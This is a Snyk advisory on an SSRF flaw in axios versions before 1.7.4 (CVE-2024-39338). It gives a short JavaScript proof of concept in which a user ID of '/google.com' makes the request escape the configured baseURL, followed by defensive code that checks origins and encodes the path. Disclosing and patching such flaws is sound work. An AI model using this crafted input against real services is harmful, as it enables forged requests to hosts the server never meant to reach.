Server-side Request Forgery (SSRF) Affecting org.webjars.npm:axios package, versions [,1.7.4)


Severity: high

CVSS assessment made by Snyk's Security Team.

Threat Intelligence

Exploit Maturity: Proof of concept
EPSS: 0.08% (38th percentile)

  • Snyk ID: SNYK-JAVA-ORGWEBJARSNPM-7675622
  • Published: 11 Aug 2024
  • Disclosed: 24 Jun 2024
  • Credit: jeffhacks

Introduced: 24 Jun 2024

CVE-2024-39338
CWE-918

How to fix?

Upgrade org.webjars.npm:axios to version 1.7.4 or higher.

Overview

org.webjars.npm:axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) because a path-relative URL that begins with two slashes is processed as a protocol-relative URL: the configured baseURL is ignored and the request is sent to the host named in the path. An attacker who controls a path segment (for example, a user ID that starts with "/") can therefore make the server issue requests to a host of their choosing.

PoC


const axios = require('axios');

// Client bound to the internal user API; every request is expected to stay on this host.
const client = axios.create({
  baseURL: 'https://userapi.example.com',
});

// Expected input: const userId = '12345';
// Attacker-controlled input: the leading "/" added in the template below turns this
// into "//google.com", which affected axios versions treat as a protocol-relative URL,
// so baseURL is ignored and the request goes to google.com.
const userId = '/google.com';

client.get(`/${userId}`).then(function (response) {
  console.log(`config.baseURL:  ${response.config.baseURL}`);
  console.log(`config.method:   ${response.config.method}`);
  console.log(`config.url:      ${response.config.url}`);
  console.log(`res.responseUrl: ${response.request.res.responseUrl}`);
});

Output:

config.baseURL:  https://userapi.example.com
config.method:   get
config.url:      //google.com
res.responseUrl: http://www.google.com/
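The output above is what WHATWG URL resolution produces when "//google.com" is resolved against the base: the host in the path wins. The following is an added example, not code from the Snyk advisory or from the axios project, showing how an application can keep a user-supplied path segment from ever escaping the configured origin, independently of the axios upgrade. It uses only Node's built-in URL class; the helper names (isProtocolRelative, resolvesToBaseOrigin, safeUserPath, buildRequestUrl) and the demo values are assumptions for this example.

```javascript
// Added example (not from the advisory or the axios project): guarding a
// user-controlled path segment before it is joined to a baseURL.

// Naive check: does the path literally start with two slashes, which a URL
// parser reads as protocol-relative ("//host/...")? This catches the PoC's
// "/" + "/google.com" but not every spelling a WHATWG parser accepts, e.g.
// "/\\google.com" is also treated as "https://google.com/" (see the test).
function isProtocolRelative(path) {
  return /^\/\//.test(path);
}

// Robust check: resolve the path against the base exactly as the URL parser
// will, then compare origins. "//host", "/\\host" and absolute "http://host"
// all resolve to a different origin and are reported as unsafe.
function resolvesToBaseOrigin(baseURL, path) {
  const base = new URL(baseURL);
  const resolved = new URL(path, base);
  return resolved.origin === base.origin;
}

// Encode the user-supplied value so it can only ever be one path segment:
// "/" becomes "%2F", so "/google.com" can no longer form "//google.com".
function safeUserPath(userId) {
  return '/' + encodeURIComponent(String(userId));
}

// Build the final request URL and refuse anything that leaves the base origin.
// The returned href is what would be handed to the HTTP client.
function buildRequestUrl(baseURL, path) {
  const base = new URL(baseURL);
  const resolved = new URL(path, base);
  if (resolved.origin !== base.origin) {
    throw new Error(`refusing request that leaves ${base.origin}: ${resolved.href}`);
  }
  return resolved.href;
}

// Demo with the advisory's PoC values (constructed input, assumed base URL).
const BASE = 'https://userapi.example.com';
for (const userId of ['12345', '/google.com']) {
  const rawPath = `/${userId}`; // exactly what the PoC's template builds
  try {
    console.log(`raw ${rawPath} -> ${buildRequestUrl(BASE, rawPath)}`);
  } catch (err) {
    console.log(`raw ${rawPath} -> rejected (${err.message})`);
  }
  const safe = safeUserPath(userId);
  console.log(`encoded ${safe} -> ${buildRequestUrl(BASE, safe)}`);
}
```

The origin comparison is the check worth keeping: it is evaluated on the URL the parser actually produces, so it does not depend on enumerating every slash or backslash spelling that a regex would have to anticipate. Encoding the segment with encodeURIComponent is the complementary fix at the point where the value is placed into the path.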
